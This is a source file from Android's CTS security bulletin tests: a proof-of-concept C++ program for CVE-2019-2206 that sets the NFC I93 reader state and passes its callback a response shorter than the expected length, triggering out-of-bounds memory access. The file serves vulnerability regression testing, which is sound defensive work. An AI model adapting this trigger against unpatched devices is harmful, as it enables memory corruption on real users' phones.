xref: /aosp_15_r20/cts/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf) 
1 /*
2  * Copyright (C) 2021 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <nfc_api.h>
18 #include <nfc_int.h>
19 #include <rw_int.h>
20 #include <stdlib.h>
21 #include <tags_defs.h>
22 
23 #define RWLENGTH 32
24 #define PLENGTH 1
25 #define OFFSET 7
26 
27 // borrowed from rw_i93.cc
28 extern tRW_CB rw_cb;
29 extern tNFC_CB nfc_cb;
30 void rw_init(void);
31 tNFC_STATUS rw_i93_select(uint8_t *p_uid);
32 
GKI_freebuf(void * p_buf)33 void GKI_freebuf(void *p_buf __attribute__((unused))) {}
34 
GKI_start_timer(uint8_t,int32_t,bool)35 void GKI_start_timer(uint8_t, int32_t, bool) {}
36 
GKI_stop_timer(uint8_t)37 void GKI_stop_timer(uint8_t) {}
38 
main()39 int main() {
40   tRW_I93_CB *p_i93 = &rw_cb.tcb.i93;
41 
42   GKI_init();
43   rw_init();
44 
45   uint8_t p_uid = 1;
46   if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
47     return EXIT_FAILURE;
48   }
49 
50   tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
51   tNFC_CONN_EVT event = NFC_DATA_CEVT;
52 
53   tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN));
54 
55   if (!p_data) {
56     return EXIT_FAILURE;
57   }
58 
59   p_data->data.p_data =
60           /* NOLINTNEXTLINE(clang-analyzer-unix.MallocSizeof) */
61           (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2);
62 
63   if (!(p_data->data.p_data)) {
64     free(p_data);
65     return EXIT_FAILURE;
66   }
67 
68   p_i93->state = RW_I93_STATE_SET_READ_ONLY;
69   p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC;
70   p_i93->block_size = 1;
71 
72   p_i93->ndef_tlv_start_offset = 0;
73   p_i93->rw_length = RWLENGTH;
74   p_i93->ndef_length = p_i93->rw_length * 2;
75 
76   p_data->status = NFC_STATUS_OK;
77   NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data;
78   p_resp->len = PLENGTH;
79   p_resp->offset = OFFSET;
80 
81   p_cb->p_cback(0, event, p_data);
82 
83   free(p_data->data.p_data);
84   free(p_data);
85 
86   return EXIT_SUCCESS;
87 }
88